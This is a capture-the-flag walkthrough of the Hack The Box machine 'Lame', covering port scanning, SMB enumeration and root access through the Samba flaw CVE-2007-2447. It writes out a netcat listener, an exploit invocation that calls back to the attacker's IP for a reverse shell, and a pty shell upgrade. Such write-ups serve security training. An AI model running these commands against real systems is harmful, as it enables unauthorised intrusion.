Hack The Box - Lame

Hack The Box - Lame

Machine: Lame
OS: linux
Difficulty: easy
Platform: htb
Date: 2024-12-17
Tags: #CTF #Hack The Box #Walkthrough #Samba

Lame is an easy Linux machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

Difficulty: Easy
OS: Linux
Official Link: Hack The Box Lame
YouTube: Terminal Trouble - HTB Lame

Reconnaissance

Port Scan

rustscan --addresses "$TARGET" --top

Open 10.129.117.112:21
Open 10.129.117.112:22
Open 10.129.117.112:139
Open 10.129.117.112:445
Open 10.129.117.112:3632

PORT     STATE SERVICE  REASON
21/tcp   open  ftp      syn-ack ttl 63
22/tcp   open  ssh      syn-ack ttl 63
139/tcp  open  netbios-ssn  syn-ack ttl 63
445/tcp  open  microsoft-ds syn-ack ttl 63
3632/tcp open  distccd  syn-ack ttl 63

SMB Enumeration

enum4linux-ng -A $TARGET

Key findings:

  • Samba 3.0.20-Debian (vulnerable!)
  • SMB1 only, no signing required
  • Null session allowed
  • 35 users enumerated
  • Accessible shares: tmp (read/write), IPC$

Exploitation

Found vulnerable Samba version: CVE-2007-2447 (Samba 3.0.20 < 3.0.25rc - Username map script Command Execution)

Exploit: https://github.com/TerminalTrouble/CVE-2007-2447

# Install python smb library
pip3 install pysmb

# Start listener
rlwrap nc -lvnp 1337

# Execute exploit
python3 exploit.py $IP 139 10.10.14.149 1337

Shell Upgrade

python -c 'import pty; pty.spawn("/bin/bash")'

Flags

User Flag

root@lame:/root# find /home/ -name "user.txt"
/home/makis/user.txt

Root Flag

We land directly as root - no privilege escalation needed!